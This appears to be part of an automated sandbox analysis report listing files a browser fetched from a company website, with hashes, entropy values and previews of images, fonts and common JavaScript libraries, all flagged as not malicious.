                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................+..........,.............................................................................................................................................J.J.........................................................................................@.!".. 0P.2.1$#4A3%........................!1..AQq"2.@.a.B.......R#3C..br40P...S$. .T.....................! @P1.0.Qa.....................!1A.Qaq.@.... P..0.........................................................................................................................................................................................................................J.l.1Li................>.l*^.Sz.....\..z............'..........$!..U....W.1rik.z.9.H.......&,.i...<=..U`...a.uE.......<H...]e....1z........g.....7<....I.o...>l~..{=5.Z...._........1.kb...............)zz+\*I.{......|........nZ=3r..w.my........'b.o.G.;.w<..n...c...@.......6.jn....'..h.H.e......f....5w.....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (8999), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8999
                                                                                                                      Entropy (8bit):5.0596643810577016
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:NKasXzHD9D5/6J8bvctcfqqTapzikrCeexsvfip9Y8pY7pZpz9n+HyQ8m8Fwmtre:wjzHD9Dpm8L2cfqqTapOeexsvfip9Yne
                                                                                                                      MD5:900BAD1DBD9B131A99F31703A66340F3
                                                                                                                      SHA1:CA580144BE55DABAE951A984529A5250D279B129
                                                                                                                      SHA-256:3C9EB9BB1076BBB11745885964334DF870BF7EB621DAA5E7475A9A5CF4B2E424
                                                                                                                      SHA-512:D0CF2C673096B76E4018A4A7F2B900570BA0094116E69BA4528B96E27F5339CD20A1CCD68ADBBA0F1E1D854CFF08A7EA10605D75D04AC5BE3E2F8CD1DA04A552
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";var t=0,e={};function i(o){if(!o)throw new Error("No options passed to Waypoint constructor");if(!o.element)throw new Error("No element option passed to Waypoint constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+t,this.options=i.Adapter.extend({},i.defaults,o),this.element=this.options.element,this.adapter=new i.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=i.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=i.Context.findOrCreateByElement(this.options.context),i.offsetAliases[this.options.offset]&&(this.options.offset=i.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),e[this.key]=this,t+=1}i.prototype.queueTrigger=function(t){this.group.queueTrigger(this,t)},i.prototype.trigger=function(t){this.enabled&&this.callback
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 134 x 121, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2700
                                                                                                                      Entropy (8bit):7.869079537914825
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:m+UyH0dbfguNC2VN/cdRqdMHo5vjHp24flJ2N25cQ5RY6Qk1jaT91Zr9:m+Glj/cdRqdNjJ3lJ/f5RY+QZr9
                                                                                                                      MD5:D7FF3B49A5E38911C7D827AC81A63F81
                                                                                                                      SHA1:0F0A9A8C868A4865C20394707412A0914D5E184C
                                                                                                                      SHA-256:BBB6A77E775D4AE2153934817ADE9E056A2BF18B606120056F25AB892FB07D15
                                                                                                                      SHA-512:FE688B0CE5FE0B6356F51020D490A83CFB95AC7BE54E3D2A7C4D1AEC1ED6021AA6EE933F128A7C09037F9969DB2E6C4A049BAC74C01D92F1C2C80CBBFD34590E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/core.png
                                                                                                                      Preview:.PNG........IHDR.......y.......Y]....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...o.E...W..Ei.....EST8.T..#........._@......%....*.4...1..B..9.!..A..........u.....;;3....&k%....~..;.S.NN...........N.b.M.....S..gU....0.5.....DD!H{'.).lKK.k..y...0y... .[..$.. ...`.e....f...."i.Q...@. IX.......0...e[....C...A...U..1..]....C>....m..I..D..D[..~.........E......`.`....kl..V^.P[.P.>...`.B]..s.VSK.A@`....M(..x7.....(.....qPj.T~s./;...C..s.u:.9@.;..-/g5.s...$./..U-..r.{......~P...$......CP../.".M0..7..m._y.y..`....d.jYN...).......O..&.{Y^Q.C..J6.,].$|hi.LL..Ptk.K|....Y........K. .e.{A.XG.w$"...s.....jLZ_[...jQ@..HD...!.}.p..)>.......p...&".E..Tu..U....[....W~..d....J..7../Z.J"RP..v7M./[?.....(Q.EF;.?.`..(..........{?.1h!..y.u.1.<.5X.S'.......}`.9.....'.5.d.]..q.....q..1..'r.oN..B.qJ..8...[....%M...)=..yG08.=.6..>...d@mw.q8.T.r2...d ....[...f....U.A.X...._..!..-.....$..]N[+. p..)..9....~t.G........xy..`.....Z..7.T..`8...:Mq.N....3.J.?.o...3!..-.d...x....W.BJ.-
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):89684
                                                                                                                      Entropy (8bit):5.290619806745655
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQv1:SdeIygP3fulzcsz8jlvaDioQ47GKK
                                                                                                                      MD5:17738318D61D394F1DE8890D589AFAEC
                                                                                                                      SHA1:F6D0C4DC1399CF02D53F5753AD46573A8BBC2AC3
                                                                                                                      SHA-256:CC7403BAB52ED166E24EA9324241045AF370BE482F5B594468F4A6AC6E7E7981
                                                                                                                      SHA-512:242FFC23ED47553221460F601CB56C507E52A163E46AB9C89C3E39AB933A54FD326B2134D3E831DF7F32614329775A0C600F63BF54F4C5B8994F090C5FBA156F
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11908
                                                                                                                      Entropy (8bit):7.731646186249466
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:hc6z6KFHaAAoEsgfQu8FH2GuYOLkR/i3sg1CyJNvudg/NNNNNNNNN4rAa8:hpZHKsgfQu8FHzuYOLQ/im+udgl
                                                                                                                      MD5:72D3CF7D57241E90C1652314077A3EFA
                                                                                                                      SHA1:54AA5C1EE7AEA69582108DA2665331CF91083D8D
                                                                                                                      SHA-256:F90ADEF645AE9B3356B60B0933FCFC7BF1A5A70F5E2B086383E6D6AA9A5B853A
                                                                                                                      SHA-512:29DF056D1B0CEE75B75584FF77639265543AA465275958A24AA6176228544DAE35163E6EEBD3BF3F0453554A0C5A63110E257A54CF2627874F58DBDEB9CE98D9
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................!m................................................................................................................................................J.J..........................................................................................0!1. 2.5@.A"B.#%6.......................!1.AQq"..3a...2.4.0..BR.#. ..r..@..s5.b.C.S$....................1. !0@Pa`..AQ....................!1AQa..q.0.... @....P.............................................................................................................................................................................................................................................................. .....5..l..*P....(.*Ig}.`.....1m........N\o..............|~.....i.h....j].....,...8..........e.........Nq..>..yt..,.x..{..~-.m.o........R..J..f...l../Vs+0.RK;Kc......Z.t.F...yv.?p..#4..T...l..].._.........z.g.u..........L[V.N~v.C.Il.../D.iY..+.....%..P....e..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10978
                                                                                                                      Entropy (8bit):7.699980119335929
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZTyByzpTOLHJ2AybaoiCUWWtQo27jQNckworeHzDm2YRgC82jMEPUjK:B3p3aopUWeNYjEXCPYeC82BPUjK
                                                                                                                      MD5:01234D3DE0C36DCA6BC3A6D9F10744A2
                                                                                                                      SHA1:D38D39F138D0BC3F0572BDE12B7C109EA149818D
                                                                                                                      SHA-256:DA2FA8AC2A9CF0E1A90515707C9E02D4FBA5D36ADF33F1680E7CDBAA7D278CD6
                                                                                                                      SHA-512:A34DBBE6004023697BD01FC34EB2EEEE5B952F31400462FF9D7DB1496B72E3958199F95F025DF82E169EF475BF39BBF01A026762EDE56CAE0A5907682E6FBAE3
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d...........................*.............................................................................................................................................J.J........................................................................................... 0!@...2....................3.....!1...AQa2 0@q."...B#......................................a!1..Q. Aq..0@....................@.................................................................................................................................................................................................................................M .3..[#.d....z-..i...^-.|..(..P...s........@i..&s..8.[...'s[!U..i...&K..!.d+..IS9...............4...=4.......-4.&s..>^..>.....X._w....0.}...m.d..].r"..d%.\.E...K......JSf...K.f].....P.*........{...L.X2.......[l.4a.<.q.-.4.j.h.<z.........n..}}.J......=.q...o>n.s.=\clZ..Z..y.lZ...........#...\....`.....v.]...k....=.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 134 x 121, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1554
                                                                                                                      Entropy (8bit):7.732728319657169
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:wmkCylglTY5dSPLyhoqZthEN21+x3Av/qeg3GoXp17UOZPcfZKAE1Na:wmkCyGlTQdouhEA+WNcphOhh
                                                                                                                      MD5:A74A478546C5CCC1DF7FB51BE5998317
                                                                                                                      SHA1:1C130EB51B1D42511FEC0CD7E415FF55CFCA3B32
                                                                                                                      SHA-256:2BC52C34404415E25EE4CF2D629D16FDEDF66F5C54179527FB647B3F13605104
                                                                                                                      SHA-512:BD7BEC302D5CFBACA6743B509F78876ED67410A660C9CD358953A9897011C31FAEBB2DBF14F1B7EAF82C8FBA8C6E4F47D73245E1391250422D5FE79125936649
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/02/mission-blue.png
                                                                                                                      Preview:.PNG........IHDR.......y.......Y]....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...m.@...}_$.`+XR....H.P.B.@...@. ... ...."Q.z.A...3....O./.....9g.6c................%.n._.......q..1.I1L>O.W.-.&_.D..P...m..A)..MH..71&.o[.1@.@..1.>...sR..Z..Vr.....J....b... ....b... ....b.@.e.m '......I...x".... ...p. .#...A......s.|]p.%.!(.j........@..1.....@..1........yy.&.s..A..g9)v.O.gq=..6D.sR.z.?.1:$...e.H%.Hq..w...H!.H9.H%.BD........e.Q]..$..S/7.'.o.1.%.-E.d.Z....=..-)..`.C+a!F.)29.X...I.?.J.$E.wDd.....UW.C..R.Q.*....r@*....G....... .!).).U.1.p.+.A..Rd.c(.(....rHaX...VD.."F......qE1.r\....)n'..(...I.d... F.......]...(f!.2'.?..:%..R.KX.+..{[.CW..n.&$9..o).q...UJqj..; EQ..$.kRdr..G]Q.".N.b.....k.^.L.!....B..=9.Bg....[.b...D...A.L./...%).......}."..ND......1.....9|."...."..9q"..r.<....]..i.+..,..V!M.)'E....R.8..[...{.t..1......!FD.._........B...2.+...>I...e.BW..$....}y9.."..3.....#../.........i...1.G.tJY.CG.^...]...a)...E.`Pr./E~.U%,..=)W.5.#._.W.wc.}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3832)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):242811
                                                                                                                      Entropy (8bit):5.6918902441176185
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:wenUzsh9sLdY6tpIOgi1MqkdHRsEpmYVLXmMWQs:weUndFRl1MqkHsEpmYVLX/WB
                                                                                                                      MD5:A7E80AD3BC939E9917EBEDF38C360D92
                                                                                                                      SHA1:CD613F984B03361E4DA257CA6E29418C74CF0049
                                                                                                                      SHA-256:9148119420E8443966EE1E6DF8ABC4EC0C302C5E06A4517C2FDCD2F51743003A
                                                                                                                      SHA-512:2B450474D938446084B45E6D95A72545A39E384D6B20C16203331291D55CAE1DF248BBC707A646008D146AFB188E94B988617D6311E90EE869C89ACB0A8EC091
                                                                                                                      Malicious:false
                                                                                                                      Preview:(function() {'use strict';function aa(){return function(a){return a}}function da(){return function(){}}function ea(a){return function(){return this[a]}}function fa(a){return function(){return a}}var m;function ha(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ia=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ja(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var la=ja(this);function p(a,b){if(b)a:{var c=la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ia(c,a,{configurable:!0,writable:!0,value:b})}}.p("Symbol",function(a){function b(f){if(this instanceo
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 322 x 227, 8-bit/color RGB, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):93971
                                                                                                                      Entropy (8bit):7.994475820603387
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:oRHTtnnn0P2B6QBa//VdEPb/h5VJsr0AmP2L6GQUu86aIe0VCQU:+h0Pvx/VdEjccP2L6GQj86veGtU
                                                                                                                      MD5:DB950D14E2EB48AAB22A64E175065274
                                                                                                                      SHA1:04264518930DB8313206FE39DCFC87A86876C3A2
                                                                                                                      SHA-256:8690B3E816C86885CC305ED2A4D88979CB4CFFC2D48B5FE214521526DA7F9E5B
                                                                                                                      SHA-512:4755875647B954D8BCC6ACEB6B4DC3BDE8FB76E4C697D948A47F2C239CC70A8F660C07CC1CDE9121B510B8C9F6F9E36DD54CF9EA3F42E22C5D0562D549916112
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/02/products2.png
                                                                                                                      Preview:.PNG........IHDR...B............4....tEXtSoftware.Adobe ImageReadyq.e<..n.IDATx..I.lIv&f...u.../.eeV..X*V.......B..............N?B[mZ..H.A.F..A.^....U..$.M..XS.o....~.5;.3....$;..."....v..|.;...'....._t....F.z.|.z..............\.7.<..O.:e7'......^.;W.F.B.........;gqW.1..|.{.....~.k.........../..........#$..^.\....g././s... .#...._./...5:.y.wIt....n ]...0.......>.].....@...5..k..(oX>`.;.(...\S.Ip...~.....Cy8r.t...x,...H.K^.~...Yr......-....S..,.t..t=.......W.k.O.D...j.\................y...@.}..hX.%v.s}6..2.n.y......|\93..|..r...|%..K.K}.zf.s..X.m....-*v...z/..|.r/....4..r......'.....8...E..u.-B.'.\B.?E._...#..u...t..j.....^..../.O2......+.D/.:..l9.\F}(axc..'...&...^..wO._....;'.\.....b......V.&{..vK<.[.*..Q.$. .k.)..s.O}...x3..w.|.S.b._..@..l.|...!_..l.......P.=..PO..S..s..1...Nld...z.l....n.n!C...rW=.'?..r....].b9....v..A..>.......CI/@.M...Q..|..aY..r\.......EN.......3....t...K......_.........].;x..x&.%...=.BN..'%a..1..l..|..C.Z.X^1..h.....Z`
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):5910
                                                                                                                      Entropy (8bit):7.209639903547972
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:4W3F7i+Dfmhc9HEiZp4ZxDYujHW/kcGBfRKlCVQNz8i/KuyKczAWyN:4WwafmhskijcDM8LEbN1CuOq
                                                                                                                      MD5:AB403A2A1636BACF7FF01137B2661C68
                                                                                                                      SHA1:BAE0C70537E145E95A889C95D83DAD3498D98090
                                                                                                                      SHA-256:784A8E168C607E45D303D4828A58350DD6F37E79304E9BB91FB196D0911629E0
                                                                                                                      SHA-512:0E82B3993F0E0A79E3FC4F30A6E207C158667FD144D190BD700A85C59AC0120CDBC343807C4CC91505273ED3F0E07FBB1AD26A04BD56619BEA66F533C0A1A433
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/mediclinic.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.........................................................................................................................................................................J.J........................................................................................120P.!"B.3.4.5@C #.%......................!1Q.Aaq."....2r30P...#..@..BR...S...................@.!.0. .....................!1.AQaq.0..@P... ..........................................................................................................................................................................................................................................................................................0`...................a6p.............. ....._F~........."..0. .. .K.....v... ....Y...<.du...y..v...s.U.ts.r..-.R..........&z...4..-l.;4..u)Z8.&...>..Y......Z.m~...v..j....KJ...|........."+.3.....3G.......<;5M.^.7o.....r.|.[..j............./a..^+......U[.}.^.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (891)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3525
                                                                                                                      Entropy (8bit):5.3001574200261725
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:aHDf7NdVfHJ2SekGCaLDHOEbxGAucfmTOl:cDf7NdVgSekWLDHOEFGBuTl
                                                                                                                      MD5:7198C8A09D893A8186915337B7D5DFF5
                                                                                                                      SHA1:6AFE77C6CC89F606F32613635FE2EA5993C9A208
                                                                                                                      SHA-256:C8922164ABC4C4EC01CA25612D98B9B45413F34A13E3C432FD418A61E7A311CD
                                                                                                                      SHA-512:4BEA726822A094C578CBFF353E4C62928F9908AF21D24948F8649BED12FED08E5A4B92FF757AE6CA94C25492244C191DBD171AE3B42440FC3B3EFFAED03CEF7C
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/search_impl.js
                                                                                                                      Preview:google.maps.__gjsload__('search_impl', function(_){var Hyb=function(a,b){_.Xg(a.Gg,1,b)},Iyb=function(a,b){_.Xg(a.Gg,3,b)},Kyb=function(a){if(_.an[15]){var b=a.Kl;const c=a.Kl=a.getMap();b&&a.Eg&&(a.Hg?(b=b.__gm.gk,b.set(b.get().Un(a.Eg))):a.Eg&&_.qZa(a.Eg,b)&&((a.Fg||[]).forEach(_.uk),a.Fg=null));if(c){b=new _.Nw;const d=a.get("layerId").split("|");b.layerId=d[0];for(let e=1;e<d.length;++e){const [f,...g]=d[e].split(":");b.parameters[f]=g.join(":")}a.get("spotlightDescription")&&(b.spotlightDescription=new _.Sv(a.get("spotlightDescription")));a.get("paintExperimentIds")&&.(b.paintExperimentIds=a.get("paintExperimentIds").slice(0));a.get("styler")&&(b.styler=new _.Ov(a.get("styler")));a.get("roadmapStyler")&&(b.roadmapStyler=new _.Ov(a.get("roadmapStyler")));a.get("travelMapRequest")&&(b.travelMapRequest=new _.tpa(a.get("travelMapRequest")));a.get("mapsApiLayer")&&(b.mapsApiLayer=new _.Tv(a.get("mapsApiLayer")));a.get("mapFeatures")&&(b.mapFeatures=a.get("mapFeatures"));a.get("clickabl
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (745)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26583
                                                                                                                      Entropy (8bit):4.801142969566439
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:WKiitGHBpfOiaCKaUGia7tyIADu8vVeTUVEMm7BGBS:TtEJz5Zy/Du8vY3
                                                                                                                      MD5:7493AC7B2815C1B0DB6EC26A2080B625
                                                                                                                      SHA1:35B090889DB267C357C08A2BD28F4A9FC199D796
                                                                                                                      SHA-256:AF6AAD45DFEA3DAD21AE2D7D9B2B44E7EE84EC9B9DF016489EC4F003EDF1314F
                                                                                                                      SHA-512:0EAC8F30EAFDF236CA0D8E96599CE6DAE7A99EB4E48AEAFBCB2E9DD0A239AA8AAC7145FFCF32719E90E0D505C5BCCC89F4EB6B367AF49DB3ADFBCA0C9983A9A3
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!. * WPBakery Page Builder v6.0.0 (https://wpbakery.com). * Copyright 2011-2021 Michael M, WPBakery. * License: Commercial. More details: http://go.wpbakery.com/licensing. */..// jscs:disable.// jshint ignore: start..(function($) {. "function" != typeof window.vc_js && (window.vc_js = function() {. /* nectar addition */. vc_rowBehaviour();. }), "function" != typeof window.vc_plugin_flexslider && (window.vc_plugin_flexslider = function($parent) {. ($parent ? $parent.find(".wpb_flexslider") : jQuery(".wpb_flexslider")).each(function() {. var this_element = jQuery(this),. sliderTimeout = 1e3 * parseInt(this_element.attr("data-interval"), 10),. sliderFx = this_element.attr("data-flex_fx"),. slideshow = 0 == sliderTimeout ? !1 : !0;. this_element.is(":visible") && this_element.flexslider({. animation: sliderFx,. slideshow: slideshow,. slideshowSpeed: s
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):48236
                                                                                                                      Entropy (8bit):7.994912604882335
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
                                                                                                                      MD5:015C126A3520C9A8F6A27979D0266E96
                                                                                                                      SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                                                                      SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                                                                      SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                                                                      Malicious:false
                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                                                                      Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (554)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):195339
                                                                                                                      Entropy (8bit):5.631215123326387
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:g3AZzctEut7oE5UetupKwtZx2hCrLKZoqGZhaV2lQD7hqAYZN8HK1hg1Md01m6jf:gQZzcmutf5UetsKwzx2hCreZoqGZhaai
                                                                                                                      MD5:CE4DFF39124FC25BB414CB5D839233DF
                                                                                                                      SHA1:08343FA62873457B13BB894227E3DAFBBDE17716
                                                                                                                      SHA-256:7B367E5B3A94A7704B66F17ADC9D8F44D1F19AF96E59E8E528745B9DADC303D1
                                                                                                                      SHA-512:7AC2A1AAC2ED73C50E7B25A0F65AF83636CB3CC7047D57A190AF84E221359B443AF6691C060EC3BD3AA1253D2B5D644484BE496DC773253937051E41F6965139
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/util.js
                                                                                                                      Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var jxa,kxa,mxa,oxa,HB,pxa,qxa,sxa,JB,LB,txa,MB,NB,uxa,QB,wxa,UB,WB,XB,YB,ZB,$B,bC,cC,xxa,dC,yxa,gC,iC,jC,kC,Axa,Bxa,lC,Cxa,oC,rC,sC,Dxa,vC,Gxa,wC,yC,zC,Ixa,Jxa,Kxa,Mxa,FC,Oxa,GC,Qxa,HC,Sxa,Rxa,Txa,Uxa,Vxa,Wxa,Xxa,Yxa,Zxa,$xa,aya,bya,cya,dya,eya,fya,gya,hya,iya,jya,kya,LC,nya,NC,oya,pya,qya,rya,sya,tya,uya,vya,wya,xya,yya,Aya,Cya,Eya,Gya,Iya,Kya,Mya,Oya,Qya,Sya,Tya,Uya,Vya,Wya,Xya,Yya,Zya,OC,$ya,aza,bza,cza,dza,eza,gza,QC,RC,hza,iza,jza,kza,lza,mza,nza,oza,pza,qza,rza,SC,sza,TC,tza,uza,vza,wza,xza,.yza,zza,UC,Aza,VC,Bza,Cza,Dza,Eza,Fza,Gza,Hza,Iza,Jza,Kza,Lza,Mza,Nza,Oza,Pza,Qza,Rza,Sza,Tza,Vza,Wza,Xza,Zza,XC,$za,aAa,bAa,cAa,dAa,eAa,iAa,jAa,lAa,oAa,pAa,qAa,hD,rAa,iD,sAa,jD,tAa,uAa,uD,vD,wAa,xD,yD,zD,yAa,zAa,AAa,CD,DD,FD,GD,BAa,HD,JD,CAa,EAa,FAa,HAa,LAa,MAa,PD,QAa,UAa,VAa,WAa,SD,XAa,ZAa,$Aa,aBa,bBa,VD,dBa,iBa,cE,lBa,kBa,dE,mBa,fE,oBa,pBa,qBa,sBa,uBa,EE,vBa,FE,wBa,xBa,yBa,zBa,HE,B
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7696
                                                                                                                      Entropy (8bit):7.452172173700001
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:DfHGVZtEA3+KWacSDNtooki+uGjpOziGURGzzl9lYuaQxbt:DfHiHEAOKdcSxtoo1mVgl0Et
                                                                                                                      MD5:88C032B2978EA1B18578B247AB404497
                                                                                                                      SHA1:35EEA9259F0932C9D1943846FF850770797F91D4
                                                                                                                      SHA-256:59FE6D0854BA4DE50FE17F8CAC3BBF65DC3CB82B064DA09A82DE164CF4DCF283
                                                                                                                      SHA-512:21B6067ACB5921E9E933B8CC76BDBE92B0BFE10CC835959422DCB8C932D70EA0477DE5FDF584C031711C8CA51DD5BBCABF218701547C73556EE74A710B560A8C
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d........................*................................................................................................................................................J.J.......................................................................................P.... 0@!1"#.4.563.2$%......................!1A...Qa.".q....2BR.#. .b.0@r.3$.....Cs...........................................!1AQa.q... P.0...@...............................................................................................................................................................................................................................................................................(..D..{....l.0.A..A..:pHr.s.}..H...p...L.qI...X.!X..H.,.:F..-.BI..g.r.`n.D\..A.'....".,....I...T.....0...dp..l..n.5...o+X..L.M..>....B>h..L.. ...Z`......W.@.Qi."a.c{....K..V.KH....i..T.B.8....- .......<.p.L......d........p.D....W..%$...0uI.V..^..dI...>.R.+..9...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (7964), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):7964
                                                                                                                      Entropy (8bit):4.958668862210391
                                                                                                                      Encrypted:false
